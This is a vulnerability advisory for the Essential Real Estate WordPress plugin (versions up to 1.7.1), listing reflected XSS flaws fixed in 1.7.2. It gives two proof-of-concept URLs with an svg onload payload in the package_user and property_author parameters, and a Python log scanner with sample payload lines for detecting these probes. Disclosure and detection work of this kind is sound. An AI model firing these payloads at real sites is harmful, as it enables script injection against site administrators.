Essential Real Estate <= 1.7.1 - XSS



Description
Multiple XSS issues across the plugin.
Proof of Concept
Example:
https://<BLOG>/wp-admin/edit.php?post_status=all&post_type=user_package&package_user="><svg/onload=alert(/XSS/)>&filter_action=Filter&paged=1

https://<BLOG>/wp-admin/edit.php?post_status=all&post_type=property&property_author="><svg/onload=alert(/XSS/)>&property_identity&filter_action=Filter&paged=1
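
A log check for the two request patterns above, added here as an example and not part of the original advisory or the plugin's code: it flags requests to edit.php whose package_user or property_author value decodes to characters that close an HTML attribute or open a tag. The combined access-log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# post_type -> filter parameter, both taken from the advisory's PoC URLs.
WATCHED = {"user_package": "package_user", "property": "property_author"}
# Characters that let a value close an HTML attribute or open a tag.
BREAKOUT = re.compile(r'["<>]')
# Request field of a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IPs, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Jul/2019:10:00:00 +0000] "GET /wp-admin/edit.php?'
    'post_status=all&post_type=user_package&package_user=%22%3E%3Csvg/onload'
    '=alert(/XSS/)%3E&filter_action=Filter&paged=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [04/Jul/2019:10:01:00 +0000] "GET /wp-admin/edit.php?'
    'post_status=all&post_type=user_package&package_user=42 HTTP/1.1" 200 4811',
    '203.0.113.5 - - [04/Jul/2019:10:02:00 +0000] "GET /wp-admin/edit.php?'
    'post_type=property&property_author=%2522%253E%253Csvg/onload=alert(/XSS/)'
    '%253E&property_identity&paged=1 HTTP/1.1" 200 5200',
]


def suspicious_param(line):
    """Return (param, decoded_value) for a matching request, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.endswith("/wp-admin/edit.php"):
        return None
    query = parse_qs(url.query, keep_blank_values=True)
    for post_type in query.get("post_type", []):
        param = WATCHED.get(post_type)
        for value in query.get(param, []) if param else []:
            # parse_qs decodes once; decode again to catch double-encoded probes.
            decoded = unquote(value)
            if BREAKOUT.search(decoded):
                return param, decoded
    return None


def scan(lines):
    """Return [(line_number, param, value)] for every flagged line."""
    found = ((n, suspicious_param(l)) for n, l in enumerate(lines, 1))
    return [(n, *hit) for n, hit in found if hit]
```

Hits on sites still running 1.7.1 or earlier are the ones to prioritise for the 1.7.2 update.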

Affects Plugin

Fixed in version 1.7.2

References

URL https://plugins.trac.wordpress.org/changeset?reponame=&new=2116720%40essential-real-estate&old=2076136%40essential-real-estate

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Verified No
WPVDB ID 9421

Timeline

Publicly Published 2019-06-29
Added 2019-07-04
Last Updated 2019-07-04